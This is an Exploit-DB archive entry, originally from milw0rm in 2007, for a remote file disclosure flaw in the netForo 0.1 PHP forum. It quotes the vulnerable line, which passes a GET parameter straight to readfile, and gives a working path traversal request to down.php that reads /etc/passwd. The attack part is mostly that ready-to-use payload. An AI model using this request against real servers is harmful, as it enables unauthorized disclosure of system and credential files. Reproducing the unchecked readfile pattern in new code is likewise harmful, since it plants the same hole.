netForo! 0.1 - 'down.php?file_to_download' Remote File Disclosure

EDB-ID:

3435


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-03-08


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# netForo 0.1g(file_to_download)Remote File Disclosure Exploit
# D.Script: http://sourceforge.net/projects/netforo/
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code: readfile($_GET['file_to_download']);
# Exploit:[Path_netForo]/down.php?file_to_download=../../../../etc/passwd

# milw0rm.com [2007-03-08]